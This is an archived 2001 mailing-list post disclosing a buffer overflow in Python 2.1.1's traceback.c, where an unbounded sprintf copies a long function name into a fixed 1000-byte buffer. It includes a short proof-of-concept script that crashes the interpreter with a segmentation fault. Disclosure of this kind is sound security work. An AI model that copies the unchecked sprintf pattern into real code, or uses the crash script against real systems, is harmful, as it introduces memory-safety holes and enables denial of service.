Hi, I've found buffer overflow in Python 2.1.1 source code. (Maybe there're many others) The buffer overflow is in the file traceback.c in the directory Python of the Python source code. Simply there's a sprintf done in this way: sprintf(linebuf,FMT,filename,lineno,name) What cause the overflow is the name parameter which could be > 1000 (linebuf size) Alex Martelli <aleaxat_private> has submitted the bug on sourceforge as 485175, and produced the follow script to demostrate the overflow: #!/usr/local/bin/python name = 'prova'*200 fou = open('fatto.py','w') print>>fou, 'def', print>>fou, name, print>>fou, '():' print>>fou, ' return 1/0' fou.close() import fatto print 'prima (%d)'%len(name) funz = getattr(fatto, name) try: funz() Except: print 'beccato' raise which cause segmentation fault to the Python Interpreter. That bug is present still in Python 2.0. Cheers, deneb.
This archive was generated by hypermail 2b30 : Sun Nov 25 2001 - 09:05:03 PST